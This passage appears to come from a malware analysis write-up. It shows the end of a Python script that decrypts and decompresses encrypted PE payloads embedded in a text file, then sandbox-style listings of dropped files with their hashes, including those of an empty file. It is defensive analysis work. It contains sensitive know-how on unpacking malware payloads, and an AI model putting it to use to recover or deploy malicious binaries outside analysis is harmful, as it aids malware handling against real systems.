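        key, iv = load_key_iv()
        text = Path(sys.argv[1]).read_text(encoding="utf-8", errors="ignore")
        for i, ct in enumerate(extract_ciphertexts(text)):
            pe = decrypt_and_decompress(ct, key, iv)
            print(f"payload {i}: {len(pe)} bytes, MZ={pe[:2] == b'MZ'}, sha256={hashlib.sha256(pe).hexdigest()}")
            Path(f"payload{i}.bin").write_bytes(pe)
```

The padding check matters in practice: with CBC, a wrong key or IV still decrypts without error, and the only signal is garbage PKCS7 padding followed by a gzip failure, so rejecting bad padding explicitly gives a clear diagnosis instead of a misleading decompression exception.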
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
12.3MB
MD5
1a270a2d79f958a83af1ab2b5805e43c
SHA1
aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb
SHA256
5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c
SHA512
00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ3IQV36WKD3F1BFXVG1.temp
Filesize
7KB
MD5
93e39f76d77b580fa62d450532298270
SHA1
354372f4ed848fe8c790e8e6e700a595e002c828
SHA256
b833caf25d47174e317e35221ed2403bff6ac13af2d054ef654dd7ef745b32ae
SHA512
230a04565c3430e12963022e42b04ab725f8882ecf2c9edb6af61b50a985853eb2cc7e97434125003ccc46fa70330d263b7db3ce95e12d61d090fe9a2e2f3a6c
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(these are the MD5/SHA1/SHA256/SHA512 values of a zero-length file: the dropped file was empty)